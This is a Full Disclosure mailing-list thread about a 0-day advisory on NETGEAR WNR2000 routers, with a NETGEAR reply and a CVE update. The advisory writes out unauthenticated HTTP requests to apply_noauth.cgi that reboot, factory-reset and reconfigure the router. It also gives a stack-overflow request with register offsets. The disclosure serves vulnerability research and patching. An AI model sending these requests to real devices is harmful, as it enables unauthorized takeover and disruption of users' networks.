Re: [0-day] RCE and admin credential disclosure in NETGEAR WNR2000

[Netgear Security <security () netgear com>]

Hello Pedro,

We have noted the CVEs within our internal records and will update the kb accordingly. Thank you for letting us know.

If you have time, are you able to verify the firmware remediates the vulnerability? Thank you for taking the time to 
continue to research this vulnerability. We appreciate all of the hard work you have put in to make Netgear's products 
more secure for everyone.

NETGEAR’s mission is to be the innovative leader in connecting the world to the internet. To achieve this mission, we 
strive to earn and maintain the trust of our users that we will protect the privacy and security of their data.

We take all security concerns brought forth seriously and are constantly monitoring the latest threats. Being 
pro-active rather than re-active to emerging security issues is a fundamental belief at NETGEAR. Every day new security 
issues and attack vectors are created. NETGEAR strives to keep abreast on the latest state-of-the-art security 
developments by working with security researchers and companies. We appreciate the community's efforts in creating a 
more secure world.

If you have any questions or comments with regard to this information, please contact us at: security () netgear com.

Sincerely, 

Product Security Incident Response Team 
Netgear, Inc

-----Original Message-----
From: Pedro Ribeiro [mailto:pedrib () gmail com] 
Sent: Monday, January 30, 2017 2:01 AM
To: fulldisclosure () seclists org; bugtraq () securityfocus com
Cc: CVE ID Requests; CVE Request; Netgear Security
Subject: Re: [0-day] RCE and admin credential disclosure in NETGEAR WNR2000

An update on this post:

MITRE has provided me with CVE numbers.
CVE-2016-10175 for #1 (information disclosure)
CVE-2016-10176 for #2 (improper access control)
CVE-2016-10174 for #3 (stack buffer overflow)

In addition, NETGEAR has recognised the flaw and released beta firmware that is supposed to fix this vulnerability. 
This claim was NOT verified.
The beta firmware can be downloaded from:
http://kb.netgear.com/000036549/Insecure-Remote-Access-and-Command-Execution-Security-Vulnerability?cid=wmt_netgear_organic

Regards,
Pedro

On 20/12/16 21:42, Pedro Ribeiro wrote:
> Hi,
>
> tl;dr
> RCE in NETGEAR WNR2000 routers, exploitable over the LAN by default or 
> over the WAN if remote administration is enabled.
> 10.000 devices affected show up in Shodan - these are the ones with 
> remote admin enabled. There are likely tens of thousands of vulnerable 
> routers in private LANs as this device is extremely popular.
>
> As usual, NETGEAR did not respond to any of my emails, so I'm 
> releasing this advisory and exploit code as a 0-day.
> See [1] for the exploit code, but bear in mind it is only "alpha"
> quality. A more robust exploit will be released in the next week and 
> sent upstream to Metasploit.
>
> MITRE has not assigned any CVE numbers yet but I will keep trying to 
> get them. If they are not obtained then this vulnerability should be 
> referred with the BID / BugTraq number that will be assigned to it.
>
> A copy of the advisory is in
> https://raw.githubusercontent.com/pedrib/PoC/master/advisories/netgear
> -wnr2000.txt
>
> Regards,
> Pedro
>
> > > Stack buffer overflow vulnerability in NETGEAR WNR2000 router 
> > > Discovered by Pedro Ribeiro (pedrib () gmail com), Agile Information
> Security
> ======================================================================
> ====
> Disclosure: 20/12/2016 / Last updated: 20/12/2016
>
> > > Background on the affected products:
> "Wirelessly connect all of your computers and mobile devices. N300 
> WiFi speed lets you simultaneously download, stream music and video, 
> and game online. NETGEAR genie® makes it easy to setup and monitor your network.
> Parental controls keep your Internet experience safe and secure."
>
>
> > > Summary:
> The NETGEAR WNR2000 allows an administrator to perform a number of 
> sensitive functions in the web interface through an apparent CGI 
> script named apply.cgi. This script is invoked when changing Internet 
> settings, WLAN settings, restore to factory defaults, reboot the router, etc.
> However apply.cgi is not really a script, but a function that is 
> invoked in the HTTP server (uhttpd) when it receives that string in the URL.
> When reversing uhttpd, it was found that it also allows an 
> unauthenticated user to perform the same sensitive admin functions if 
> apply_noauth.cgi is invoked instead.
> Some of the functions, such as rebooting the router, can be exploited 
> straight away by an unauthenticated attacker. Other functions, such as 
> changing Internet, WLAN settings or retrieving the administrative 
> password, require the attacker to send a "timestamp" variable attached 
> to the URL. This timestamp is generated every time the target page is 
> accessed and functions as a sort of anti-CSRF token.
> The timestamp generating function was reverse engineered and due to 
> incorrect use of random number generation (details below) it is 
> possible to identify the token in less than 1000 attempts with no 
> other previous knowledge.
>
> By combining this knowledge with an information leakage, it is 
> possible to recover the administrator password. This password is then 
> used to enable telnet functionality in the router and obtain a root 
> shell if the attacker is in the LAN.
>
> Finally, a stack buffer overflow was also discovered, which combined 
> with the apply_noauth.cgi vulnerability and the timestamp identifying 
> attack allows an unauthenticated attacker to take full control of the 
> device and execute code remotely. This vulnerability allows the 
> attacker to execute code in the LAN and in the WAN.
>
> It should be noted that the WNR2000v5 does not have remote 
> administration enabled by default on the latest firmware, and unless 
> the administrator enables it, this attack is only possible in the LAN. 
> Only the WNR2000v5 device was tested, but versions 3 and 4 of this 
> router should also be vulnerable. At the time of the intial 
> disclosure, there are over 10.000 vulnerable routers appearing in a Shodan search.
>
> Exploit code has been released with this advisory, but it is of "alpha"
> quality (see [1]). This exploit code will be improved and ported to 
> Metasploit in the next week.
>
>
> > > Technical details:
> #1
> Vulnerability: Information leakage
> NO CVE ASSIGNED
> Attack Vector: Remote
> Constraints: Can be exploited by an unauthenticated attacker. See 
> below for other constraints.
> Affected versions:
> - WNR2000v5, all firmware versions (confirmed in hardware)
> - WNR2000v4, all firmware versions possibly affected (confirmed only 
> by static analysis)
> - WNR2000v3, all firmware versions possibly affected (confirmed only 
> by static analysis)
>
> The device leaks its serial number when performing a request to
> http://<device_web_portal>/BRS_netgear_success.html:
> HTTP/1.0 200 OK
> Server: uhttpd/1.0.0
> Date: Thu, 01 Jan 1970 00:11:42 GMT
> Cache-Control: no-cache
> Pragma: no-cache
> Expires: 0
> Content-Type: text/html; charset="UTF-8"
> Connection: close
>
> <html>
> <head>
> </head>
> <body>
> <script>
> /* 22281: add sn after success href */
> var sn="4D01615V0009D";                      <--- serial number of the
> device
> (...)
>
> This vulnerability is useful for further exploitation in #2.
>
>
> #2
> Vulnerability: Improper access control NO CVE ASSIGNED Attack Vector: 
> Remote
> Constraints: Can be exploited by an unauthenticated attacker. See 
> below for other constraints.
> Affected versions:
> - WNR2000v5, all firmware versions (confirmed in hardware)
> - WNR2000v4, all firmware versions possibly affected (confirmed only 
> by static analysis)
> - WNR2000v3, all firmware versions possibly affected (confirmed only 
> by static analysis)
>
> -----------------------
> The vulnerability
> -----------------------
>
> The WNR2000 router allows an administrator to perform sensitive 
> actions by invoking the apply.cgi URL on the web server of the device. 
> This special URL is handled by the embedded web server (uhttpd) and 
> processed accordingly.
> While reverse engineering uhttpd, it was discovered that another 
> function, apply_noauth.cgi allows an unauthenticated user to perform 
> sensitive actions on the device. For example, to reboot the router, 
> the following request can be sent:
>
> ====
> POST /apply_noauth.cgi?/reboot_waiting.htm HTTP/1.1
> Host: 192.168.1.1
> Content-Type: application/x-www-form-urlencoded
> Content-Length: 26
>
> submit_flag=reboot&yes=Yes
> ====
>
> To reset to factory defaults:
> ====
> POST /apply_noauth.cgi?/pls_wait_factory_reboot.html HTTP/1.1
> Host: 192.168.1.1
> Content-Type: application/x-www-form-urlencoded
> Content-Length: 19
>
> submit_flag=factory
> ====
>
> Change WLAN settings:
> ====
> POST /apply_noauth.cgi?/WLG_wireless.htm HTTP/1.1
> Host: 192.168.1.1
> Content-Type: application/x-www-form-urlencoded
> Content-Length: 754
>
> submit_flag=wlan&Apply=Apply&hidden_wlan_mode=&hidden_wlan_channel=&ge
> nerate_flag=&old_length=&wl_sec_wpaphrase_len=17&wl_hidden_wpa_psk=som
> ewifipassword&hidden_sec_type=&wep_press_flag=&wpa1_press_flag=0&wpa2_
> press_flag=1&wpas_press_flag=0&wps_change_flag=5&hidden_enable_guestNe
> t=&hidden_enable_ssidbro=&hidden_allow_guest=&radiusServerIP=&opmode_b
> g=&wl_mode=&wl_ssid=1337Net&wl_WRegion=4&wl_hidden_wlan_channel=0&wl_h
> idden_wlan_mode=2&wl_hidden_sec_type=4&hidden_WpaeRadiusSecret=&hidden
> _WpaeRadiusSecret_a=&wl_enable_ssid_broadcast=1&hidden_enable_video=&w
> l_tx_ctrl=&wl_apply_flag=1&ssid_bc=1&ssid=NETGEAR09&wla1ssid=NETGEAR-5
> G_Guest1&wlg1ssid=NETGEAR-Guest&WRegion=4&w_channel=0&opmode=2&opmode5
> 4=1&security_type=WPA2-PSK&passphrase=somewifipassword
> ====
>
> Change password recovery settings for the administrator account:
> ====
> POST /apply_noauth.cgi?/PWD_password.htm%20timestamp=26123148 HTTP/1.1
> Host: 192.168.1.1
> Content-Type: application/x-www-form-urlencoded
> Content-Length: 188
>
> submit_flag=passwd&hidden_enable_recovery=1&Apply=Apply&sysOldPasswd=&
> sysNewPasswd=&sysConfirmPasswd=&enable_recovery=on&question1=1&answer1
> =secretanswer1&question2=2&answer2=secretanswer2
> ====
>
> These are just examples, there is a lot more functionality that can be 
> accessed using apply_noauth.cgi. However, apart from the three first 
> examples, most actions will require knowledge of a "timestamp" 
> variable which is appended to the URL (like in the fourth example).
>
>
> #3
> Vulnerability: Stack buffer overflow
> NO CVE ASSIGNED
> Attack Vector: Remote
> Constraints: Can be exploited by an unauthenticated attacker. See 
> below for other constraints.
> Affected versions:
> - WNR2000v5, all firmware versions (confirmed in hardware)
> - WNR2000v4, all firmware versions possibly affected (confirmed only 
> by static analysis)
> - WNR2000v3, all firmware versions possibly affected (confirmed only 
> by static analysis)
>
> -----------------------
> Vulnerability details
> -----------------------
>
> The HTTP server in the device (uhttpd) handles access to *.cgi files 
> in a special way. Instead of fetching a CGI file from the file system, 
> it handles them internally according to the URL. This mechanism has 
> already been described in vulnerability #2 and in the Summary section.
> A key parameter of the apply*.cgi URL is the submit_flag, which will 
> determine which uhttpd function will be invoked when processing the request.
>
> If the following request is sent:
> POST /apply.cgi?/lang_check.html%20timestamp=14948715 HTTP/1.1
> Authorization: Basic YWRtaW46cGFzc3dvcmQ=
> Content-Type: application/x-www-form-urlencoded
> Content-Length: 604
>
> submit_flag=select_language&hidden_lang_avi=aaaaaaaaaaaaaaaaaaaaaaaaaa
> aaaaaaaaaaAAAABBBBCCCCDDDDEEEEFFFFbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb
> bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb
> bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb
> bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb
> bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb
> bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb
> bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb
> bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb
>
> A stack buffer overflow occurs, which can be seen when debugging the 
> process in gdb:
> Program received signal SIGSEGV, Segmentation fault.
> 0x45454545 in ?? ()
> (gdb) i r
>           zero       at       v0       v1       a0       a1       a2
>   a3
>  R0   00000000 00000001 00000000 00000054 00000000 7fae7ee1 ffffff87
> 000009c0
>             t0       t1       t2       t3       t4       t5       t6
>   t7
>  R8   2ab96420 00000000 00000001 fffffff8 fffffffe 00000001 00000000
> 00000000
>             s0       s1       s2       s3       s4       s5       s6
>   s7
>  R16  41414141 42424242 43434343 44444444 00000002 00000025 0000002b
> 00000002
>             t8       t9       k0       k1       gp       sp       s8
>   ra
>  R24  00000002 2ab5a170 2ab825f8 00000000 0048f4a0 7fae7f18 004b51b8
> 45454545
>         status       lo       hi badvaddr    cause       pc
>       0000ff13 000f41db 000003dd 45454544 10800008 45454545
>           fcsr      fir  restart
>       00000000 00000000 00000000
> (gdb) x/32xw $sp
> 0x7fae7f18:   0x46464646      0x62626262      0x62626262      0x62626262
> (...)
>
> The following registers can be controlled by an attacker:
> $ra/$pc = index 52 of hidden_lang_avi parameter (EEEE)
> $s0 = index 36 (AAAA)
> $s1 = index 40 (BBBB)
> $s2 = index 44 (CCCC)
> $s3 = index 48 (DDDD)
> $sp = index 56 (FFFF)
>
> This vulnerability will be analysed using firmware 1.0.0.34 for the
> WNR2000v5 router.

> > > Fix:
> NETGEAR did not respond to any emails, so THERE IS NO FIX for this 
> vulnerability.
> It is recommended to replace this router with another make and model 
> that supports OpenWRT firmware.
>
> Timeline of disclosure:
> 26.09.2016: Email sent to NETGEAR (security () netgear com) asking for 
> PGP key, no response.
> 28.10.2016: Email sent to NETGEAR (security () netgear com) asking for 
> PGP key, no response.
> 26.11.2016: Disclosed vulnerability to CERT through their web portal.
> 29.11.2016: Received reply from CERT. They indicated that NETGEAR does 
> not cooperate with them, so they recommended getting CVE numbers from 
> MITRE and releasing the vulnerability information
>             Email to MITRE requesting CVE numbers, no response.
>             Email sent to NETGEAR (security () netgear com) asking for 
> PGP key, no response.
> 20.12.2016: Public disclosure.
>
>
> > > References:
> [1]
> https://raw.githubusercontent.com/pedrib/PoC/master/exploits/netgearPw
> n.rb [2] https://wiki.openwrt.org/toh/netgear/telnet.console
> [3] https://github.com/insanid/netgear-telenetenable
> [4]
> http://cdn.imgtec.com/mips-training/mips-basic-training-course/slides/
> Caches.pdf
> [5]
> https://raw.githubusercontent.com/pedrib/PoC/master/advisories/dlink-h
> nap-login.txt
> [6]
> http://cdn.imgtec.com/mips-training/mips-basic-training-course/slides/
> Memory_Map.pdf
>
>
> ================
> Agile Information Security Limited
> http://www.agileinfosec.co.uk/
> > > Enabling secure digital business >>




_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/